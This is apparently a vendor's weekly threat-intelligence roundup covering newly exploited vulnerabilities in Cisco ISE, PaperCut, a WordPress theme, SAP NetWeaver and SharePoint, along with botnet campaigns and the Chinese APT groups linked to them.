The week saw critical developments across the threat landscape, including newly added vulnerabilities to the CISA KEV catalog, and the continued targeting of enterprise infrastructure by advanced threat actors.  

CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog this week - two critical injection flaws in Cisco ISE and ISE-PIC and a vulnerability in PaperCut NG/MF commonly used in schools and businesses, was included due to its potential for unauthorized code execution. Additionally, active exploitation was observed in the Alone - Charity Multipurpose WordPress Theme, where unauthenticated attackers leveraged an arbitrary file upload flaw to gain remote access.

Botnet activity intensified as EnemyBot, Sysrv-k, Andoryu, and Androxgh0st launched widespread campaigns exploiting vulnerabilities in GitLab, Cloud Gateway, and PHP-based applications. IoT botnets such as Mirai, Bashlite, Tsunami, and BricketBot targeted exposed EirD1000 routers, enabling lateral movement within enterprise networks through mass exploitation.  

This week also brought attention to advanced threat activity as Darktrace reported that threat actors exploited a critical flaw in SAP NetWeaver, to deploy the Auto-Color backdoor in an attack against U.S. chemical firm. Meanwhile, Microsoft attributed ongoing exploitation of SharePoint vulnerabilities to China-based APTs: Linen Typhoon (APT27), Violet Typhoon (APT31), and Storm-2603 - the latter linked to Warlock Ransomware deployment.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-5394
An Arbitrary File Upload Vulnerability in Alone - Charity Multipurpose Non-Profit WordPress Theme, enabling unauthenticated attackers to upload malicious files and achieve remote code execution on affected WordPress sites. Tracked as a critical issue with a CVSS Score of 9.8, the vulnerability impacts versions up to and including 7.8.3 and has been patched in version 7.8.5. Despite the public disclosure by Wordfense on July 14,2025, exploitation had already begun two days earlier on July 12, underscoring how threat actors actively monitor code changes for emerging vulnerabilities. The Wordfence security team noted that its firewall blocked over 120,900 exploitation attempts, and a public proof-of-concept (PoC) is now available, further fueling active in-the-wild exploitation of this flaw. Immediate patching and monitoring are strongly advised.

CVE-2025-20281
An Injection Vulnerability in Cisco Identity Services Engine (ISE) and ISE-PIC stems from inadequate validation of user-supplied input within a specific API endpoint. This flaw, rated with a critical CVSS Score of 10.0, enables remote attackers to submit specially crafted API requests, potentially leading to remote code execution with root-level privileges on affected devices. The vulnerability affects Cisco ISE versions 3.3 and 3.4, exposing enterprise environments to severe risks if left unpatched. In response, Cisco has released updated versions to mitigate the issue, while CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, highlighting its exploitation in the wild and the urgency of remediation.

CVE-2025-20337
An Injection Vulnerability in Cisco Identity Services Engine (ISE) and ISE-PIC stems from inadequate validation of user-supplied input within a specific API endpoint. This flaw, rated with a critical CVSS Score of 10.0, enables remote attackers to submit specially crafted API requests, potentially leading to remote code execution with root-level privileges on affected devices. The vulnerability affects Cisco ISE versions 3.3 and 3.4, exposing enterprise environments to severe risks if left unpatched. In response, Cisco has released updated versions to mitigate the issue, while CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, highlighting its exploitation in the wild and the urgency of remediation.

CVE-2023-2533
A Cross-Site Request Forgery Vulnerability in PaperCut NG/MF, widely used by schools, businesses, and government agencies for managing print operations, allows attackers to execute arbitrary code under certain conditions. The flaw assigned with a high CVSS Score of 8.8, affects version 22.0.10 (Build 65996, released on 2023-03-27) and was initially patched in June 2023. Given that the admin interface typically runs on internal web servers, successful exploitation could allow attackers to leverage an authenticated admin session to manipulate security settings or gain a foothold into broader network environments. This vulnerability has now been added to the CISA KEV catalog, emphasizing the need for organizations to apply patches and reinforce CSRF protections immediately.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2025-31324
According to Darktrace, threat actors exploited a now-patched critical vulnerability in SAP NetWeaver; CVE-2025-31324, to deploy the Auto-Color backdoor during an attack on a U.S.-based chemicals company in April 2025. The attackers gained access to the victim’s network over a span of three days, attempted to download suspicious files, and communicated with malicious infrastructure tied to the Auto-Color malware.  Auto-Color, a backdoor targeting Linux system, was initially documented by Palo Alto Networks in February 2025. It had been used in campaigns targeting universities and government agencies across North America and Asia between November and December 2024. The malware derives its name from its behavior of renaming itself to /var/log/cross/auto-color after execution to blend into legitimate system files and maintain persistence.

Microsoft Links SharePoint Exploits to Chinese APTs
Microsoft has formally attributed the ongoing exploitation of vulnerabilities in internet-facing SharePoint Server instances to three China-based threat actors: Linen Typhoon, Violet Typhoon, and Storm-2603. The malicious activity, observed as early as July 7, 2025, corroborates earlier threat intelligence findings.  Linen Typhoon (also known as APT27 or Emissary Panda) is a long-standing espionage group known for leveraging tools like SysUpdate and PlugX. Violet Typhoon (aka APT31) has operated since 2015, previously targeting countries including the United States, Finland, and Czechia in cyber espionage operations. Meanwhile, Storm-2603 has been linked to the deployment of Warlock Ransomware, and has previously been associated with the LockBit Ransomware ecosystem as well. Microsoft has cautioned that the growing use of these exploits suggests attackers will likely continue to target unpatched SharePoint systems. To mitigate the threat, organizations are urged to enable the Antimalware Scan Interface (AMSI) in Full Mode and deploy endpoint protection solutions, such as Microsoft Defender Antivirus, across all on-premise SharePoint environments.  

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/07/28/cisa-adds-three-known-exploited-vulnerabilities-catalog
2. https://securityonline.info/critical-rce-flaw-cve-2025-5394-in-alone-wordpress-theme-actively-exploited-allowing-full-site-takeover/  
3. https://www.wordfence.com/blog/2025/07/attackers-actively-exploiting-critical-vulnerability-in-alone-theme/
4. https://www.darktrace.com/blog/auto-color-backdoor-how-darktrace-thwarted-a-stealthy-linux-intrusion
5. https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/
6. https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/